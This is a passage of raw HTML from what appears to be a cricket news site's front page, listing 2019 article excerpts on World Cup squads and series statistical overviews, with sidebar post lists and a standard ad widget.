Tri-Nation series. 2019 Ireland Tri-Nation series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/2019-ireland-tri-nation-series-statistical-overview/" title="2019 Ireland Tri-Nation Series: Statistical Overview">2019 Ireland Tri-Nation Series: Statistical Overview</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt "> <header> <a href="https://www.mobilecric.com/2019-indian-premier-league-statistical-overview/" title="Indian Premier League 2019: Statistical Overview" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-200x200.jpeg" class="attachment-featured size-featured wp-post-image" alt="Indian Premier League 2019, Indian Premier League 2019-Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-200x200.jpeg 200w, https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-150x150.jpeg 150w, https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-80x80.jpeg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/2019-indian-premier-league-statistical-overview/" title="Indian Premier League 2019: Statistical Overview">Indian Premier League 2019: Statistical Overview</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/twenty20-news/" rel="nofollow">Twenty20 News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt "> <header> <a href="https://www.mobilecric.com/abu-jayed-mossadek-hossain-included-in-bangladeshs-world-cup/" title="Abu Jayed, Mossadek Hossain included in Bangladesh&#8217;s World Cup" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="Bangladesh, 2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/abu-jayed-mossadek-hossain-included-in-bangladeshs-world-cup/" title="Abu Jayed, Mossadek Hossain included in Bangladesh&#8217;s World Cup">Abu Jayed, Mossadek Hossain included in Bangladesh&#8217;s World Cup</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt last"> <header> <a href="https://www.mobilecric.com/pakistan-announce-15-member-squad-for-2019-cricket-world-cup/" title="Pakistan announce 15-member squad for 2019 Cricket World Cup" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/04/Pakistan-World-Cup-Squad-2019-1-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="Pakistan, 2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/Pakistan-World-Cup-Squad-2019-1-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/04/Pakistan-World-Cup-Squad-2019-1-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/Pakistan-World-Cup-Squad-2019-1-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/pakistan-announce-15-member-squad-for-2019-cricket-world-cup/" title="Pakistan announce 15-member squad for 2019 Cricket World Cup">Pakistan announce 15-member squad for 2019 Cricket World Cup</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt "> <header> <a href="https://www.mobilecric.com/aiden-markram-anrich-nortje-included-in-south-africas-world-cup-squad/" title="Aiden Markram, Anrich Nortje included in South Africa&#8217;s World Cup squad" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/04/South-Africa-World-Cup-Squad-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="South Africa, 2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/South-Africa-World-Cup-Squad-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/04/South-Africa-World-Cup-Squad-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/South-Africa-World-Cup-Squad-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/aiden-markram-anrich-nortje-included-in-south-africas-world-cup-squad/" title="Aiden Markram, Anrich Nortje included in South Africa&#8217;s World Cup squad">Aiden Markram, Anrich Nortje included in South Africa&#8217;s World Cup squad</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt "> <header> <a href="https://www.mobilecric.com/australia-name-warner-and-smith-in-world-cup-squad-handscomb-misses-out/" title="Australia name Warner and Smith in World Cup squad, Handscomb misses out" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/04/d14ccea4da0e4ca507e2ee8808ca643a-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="Australia, 2019 Crickwt World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/d14ccea4da0e4ca507e2ee8808ca643a-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/04/d14ccea4da0e4ca507e2ee8808ca643a-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/d14ccea4da0e4ca507e2ee8808ca643a-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/australia-name-warner-and-smith-in-world-cup-squad-handscomb-misses-out/" title="Australia name Warner and Smith in World Cup squad, Handscomb misses out">Australia name Warner and Smith in World Cup squad, Handscomb misses out</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt last"> <header> <a href="https://www.mobilecric.com/india-include-dinesh-karthik-lokesh-rahul-and-ravendra-jadeja-in-the-world-cup-squad/" title="India include Dinesh Karthik, Lokesh Rahul and Ravendra Jadeja in the World Cup squad" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/04/India-World-Cup-squad-2019-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="India, 2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/India-World-Cup-squad-2019-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/04/India-World-Cup-squad-2019-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/India-World-Cup-squad-2019-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/india-include-dinesh-karthik-lokesh-rahul-and-ravendra-jadeja-in-the-world-cup-squad/" title="India include Dinesh Karthik, Lokesh Rahul and Ravendra Jadeja in the World Cup squad">India include Dinesh Karthik, Lokesh Rahul and Ravendra Jadeja in the World Cup squad</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt "> <header> <a href="https://www.mobilecric.com/top-3-teams-that-could-win-2019-cricket-world-cup/" title="Top 3 Teams that could win 2019 Cricket World Cup" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/04/GettyImages-596410064-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/GettyImages-596410064-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/04/GettyImages-596410064-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/GettyImages-596410064-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/top-3-teams-that-could-win-2019-cricket-world-cup/" title="Top 3 Teams that could win 2019 Cricket World Cup">Top 3 Teams that could win 2019 Cricket World Cup</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <!--Start Pagination--> <div class='pagination'><ul><li class='current'><span class='currenttext'>1</span></li><li><a rel='nofollow' href='https://www.mobilecric.com/page/2/' class='inactive'>2</a></li><li><a rel='nofollow' href='https://www.mobilecric.com/page/3/' class='inactive'>3</a></li><li><a rel='nofollow' href='https://www.mobilecric.com/page/2/' class='inactive'>Next &rsaquo;</a></li><li><a rel='nofollow' class='inactive' href='https://www.mobilecric.com/page/29/'>Last &raquo;</a></li></ul></div> <!--End Pagination--> </div> </div> <aside class="sidebar c-4-12"> <div id="sidebars" class="g"> <div class="sidebar"> <ul class="sidebar_list"> <li id="tab-2" class="widget widget-sidebar widget_tab"> <div id="tabber"> <ul class="tabs"> <li><a href="#popular-posts"><i class="icon-list-ol"></i> Popular Posts</a></li> <li class="tab-recent-posts"><a href="#recent-posts"><i class="icon-list-ul"></i> Recent Posts</a></li> </ul> <!--end .tabs--> <div class="clear"></div> <div class="inside"> <div id="popular-posts"> <ul> <li> <a title="England announce ODI squad for Pakistan series" href="https://www.mobilecric.com/england-announce-odi-squad-for-pakistan-series/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2017/12/i-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Junaid Khan-ruled-out-of-New Zealand-tour-2018-mobilecric.com" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/12/i-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">England announce ODI squad for Pakistan series</p> </a> <div class="clear"></div> </li> <li> <a title="India announce their squad for ODIs and T20 series against England" href="https://www.mobilecric.com/india-announce-squad-odis-t20-series-england/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2017/01/MS1-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/01/MS1-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2017/01/MS1-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/01/MS1-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">India announce their squad for ODIs and T20 series against England</p> </a> <div class="clear"></div> </li> <li> <a title="Australia has named their one day squad for series against Pakistan" href="https://www.mobilecric.com/australia-named-one-day-squad-series-pakistan/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2017/01/Aaron-Finch-of-Australia-bats7-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/01/Aaron-Finch-of-Australia-bats7-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2017/01/Aaron-Finch-of-Australia-bats7-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/01/Aaron-Finch-of-Australia-bats7-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">Australia has named their one day squad for series against Pakistan</p> </a> <div class="clear"></div> </li> <li> <a title="Sydney Thunder thump city rivals Sixers by eight wickets" href="https://www.mobilecric.com/sydney-thunder-thump-city-rivals-sixers-eight-wickets/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2017/01/257656-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/01/257656-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2017/01/257656-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/01/257656-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">Sydney Thunder thump city rivals Sixers by eight wickets</p> </a> <div class="clear"></div> </li> <li> <a title="Melbourne Stars cruise to a seven-wicket win over Perth Scorchers" href="https://www.mobilecric.com/melbourne-stars-cruise-seven-wicket-win-perth-scorchers/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2017/01/257672-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/01/257672-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2017/01/257672-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/01/257672-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">Melbourne Stars cruise to a seven-wicket win over Perth Scorchers</p> </a> <div class="clear"></div> </li> </ul> </div> <!--end #popular-posts--> <div id="recent-posts"> <ul> <li> <a title="England vs Pakistan 2019 ODI Series: Statistical Overview" href="https://www.mobilecric.com/england-vs-pakistan-2019-odi-series-statistical-overview/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="England vs Pakistan 2019 ODI Series, England vs Pakistan 2019 ODI series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">England vs Pakistan 2019 ODI Series: Statistical Overview</p> </a> <div class="clear"></div> </li> <li> <a title="England announce ODI squad for Pakistan series" href="https://www.mobilecric.com/england-announce-odi-squad-for-pakistan-series/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2017/12/i-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Junaid Khan-ruled-out-of-New Zealand-tour-2018-mobilecric.com" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/12/i-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">England announce ODI squad for Pakistan series</p> </a> <div class="clear"></div> </li> <li> <a title="2019 Ireland Tri-Nation Series: Statistical Overview" href="https://www.mobilecric.com/2019-ireland-tri-nation-series-statistical-overview/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="2019 Ireland Tri-Nation series. 2019 Ireland Tri-Nation series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">2019 Ireland Tri-Nation Series: Statistical Overview</p> </a> <div class="clear"></div> </li> <li> <a title="Indian Premier League 2019: Statistical Overview" href="https://www.mobilecric.com/2019-indian-premier-league-statistical-overview/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-80x80.jpeg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Indian Premier League 2019, Indian Premier League 2019-Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-80x80.jpeg 80w, https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-150x150.jpeg 150w, https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-200x200.jpeg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">Indian Premier League 2019: Statistical Overview</p> </a> <div class="clear"></div> </li> <li> <a title="Abu Jayed, Mossadek Hossain included in Bangladesh&#8217;s World Cup" href="https://www.mobilecric.com/abu-jayed-mossadek-hossain-included-in-bangladeshs-world-cup/"> <div class="left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Bangladesh, 2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> <div class="clear"></div> </div> <p class="entry-title">Abu Jayed, Mossadek Hossain included in Bangladesh&#8217;s World Cup</p> </a> <div class="clear"></div> </li> </ul> </div> <!--end #recent-posts--> <div class="clear"></div> </div> <!--end .inside --> <div class="clear"></div> </div><!--end #tabber --> </li> <li id="custom_html-2" class="widget_text widget widget-sidebar widget_custom_html"><div class="textwidget custom-html-widget"> <div id="taboola-right-rail-thumbnails"></div> <script type="text/javascript">   window._taboola = window._taboola || [];   _taboola.push({     mode: 'thumbnails-rr',     container: 'taboola-right-rail-thumbnails',     placement: 'Right Rail Thumbnails',     target_type: 'mix'   }); </script> </div></li><li id="single_category_posts_widget-2" class="widget widget-sidebar widget_single_category_posts_widget"><div class="widget-wrap"><h3>Featured Category</h3></div><ul class="category-posts"> <li> <a href="https://www.mobilecric.com/top-3-all-rounders-to-watch-out-for-in-2019-cricket-world-cup/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/04/m37khat_jos-buttler-and-ben-stokes_625x300_20_March_19-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/m37khat_jos-buttler-and-ben-stokes_625x300_20_March_19-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2019/04/m37khat_jos-buttler-and-ben-stokes_625x300_20_March_19-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/m37khat_jos-buttler-and-ben-stokes_625x300_20_March_19-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/top-3-all-rounders-to-watch-out-for-in-2019-cricket-world-cup/"> Top 3 All-rounders to watch out for in 2019 Cricket World Cup </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/gautam-gambhir-announces-his-retirement-from-international-cricket/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2018/12/gutam-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Gautam Gambhir" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2018/12/gutam-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2018/12/gutam-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2018/12/gutam-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/gautam-gambhir-announces-his-retirement-from-international-cricket/"> Gautam Gambhir announces his retirement from international cricket </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/pakistan-vs-new-zealand-2018-test-series-statistical-overview/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2018/11/Pakistan-vs-New-Zealand-2018-Test-Series-80x80.png" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Pakistan vs New Zealand 2018 Test Series, Pakistan vs New Zealand 2018 Test Series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2018/11/Pakistan-vs-New-Zealand-2018-Test-Series-80x80.png 80w, https://www.mobilecric.com/wp-content/uploads/2018/11/Pakistan-vs-New-Zealand-2018-Test-Series-150x150.png 150w, https://www.mobilecric.com/wp-content/uploads/2018/11/Pakistan-vs-New-Zealand-2018-Test-Series-200x200.png 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/pakistan-vs-new-zealand-2018-test-series-statistical-overview/"> Pakistan vs New Zealand 2018 Test Series: Statistical Overview </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/all-rounder-dwayne-bravo-retires-from-international-cricket/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2018/11/Dwayne-Bravo3-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Dwayne Bravo, West Indies Cricket" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2018/11/Dwayne-Bravo3-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2018/11/Dwayne-Bravo3-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2018/11/Dwayne-Bravo3-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/all-rounder-dwayne-bravo-retires-from-international-cricket/"> All-rounder Dwayne Bravo retires from international cricket. </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/pakistan-vs-new-zealand-2018-odi-series-statistical-overview/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2018/11/Untitled-2-80x80.png" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Pakistan vs New Zealand 2018 ODI Series, Pakistan vs New Zealand 2018 ODI Series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2018/11/Untitled-2-80x80.png 80w, https://www.mobilecric.com/wp-content/uploads/2018/11/Untitled-2-150x150.png 150w, https://www.mobilecric.com/wp-content/uploads/2018/11/Untitled-2-200x200.png 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/pakistan-vs-new-zealand-2018-odi-series-statistical-overview/"> Pakistan vs New Zealand 2018 ODI Series: Statistical Overview </a> <span class="meta"> </span > <!--end .entry-meta--> </li> </ul> </li><li id="mts_recent_posts_widget-2" class="widget widget-sidebar widget_mts_recent_posts_widget"><div class="widget-wrap"><h3>Recent Posts</h3></div><ul class="advanced-recent-posts"> <li> <a href="https://www.mobilecric.com/england-vs-pakistan-2019-odi-series-statistical-overview/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="England vs Pakistan 2019 ODI Series, England vs Pakistan 2019 ODI series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/england-vs-pakistan-2019-odi-series-statistical-overview/"> England vs Pakistan 2019 ODI Series: Statistical Overview </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/england-announce-odi-squad-for-pakistan-series/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2017/12/i-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Junaid Khan-ruled-out-of-New Zealand-tour-2018-mobilecric.com" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/12/i-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/england-announce-odi-squad-for-pakistan-series/"> England announce ODI squad for Pakistan series </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/2019-ireland-tri-nation-series-statistical-overview/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="2019 Ireland Tri-Nation series. 2019 Ireland Tri-Nation series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/2019-ireland-tri-nation-series-statistical-overview/"> 2019 Ireland Tri-Nation Series: Statistical Overview </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/2019-indian-premier-league-statistical-overview/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-80x80.jpeg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Indian Premier League 2019, Indian Premier League 2019-Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-80x80.jpeg 80w, https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-150x150.jpeg 150w, https://www.mobilecric.com/wp-content/uploads/2019/03/Indian-Premier-League-2019-Statistical-Overview-200x200.jpeg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/2019-indian-premier-league-statistical-overview/"> Indian Premier League 2019: Statistical Overview </a> <span class="meta"> </span > <!--end .entry-meta--> </li> <li> <a href="https://www.mobilecric.com/abu-jayed-mossadek-hossain-included-in-bangladeshs-world-cup/" rel="nofollow" class="mts-posts left"> <img width="80" height="80" src="https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-80x80.jpg" class="attachment-widgetthumb size-widgetthumb wp-post-image" alt="Bangladesh, 2019 Cricket World Cup" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-80x80.jpg 80w, https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/04/i-1-200x200.jpg 200w" sizes="(max-width: 80px) 100vw, 80px" /> </a> <a href="https://www.mobilecric.com/abu-jayed-mossadek-hossain-included-in-bangladeshs-world-cup/"> Abu Jayed, Mossadek Hossain included in Bangladesh&#8217;s World Cup </a> <span class="meta"> </span > <!--end .entry-meta--> </li> </ul> </li> </ul> </div> </div><!--sidebars--> </aside> </div><!--#page--> <footer> <div class="container"> <div class="footer-widgets"> <div class="f-widget f-widget-1"> </div> <div class="f-widget f-widget-2"> </div> <div class="f-widget f-widget-3 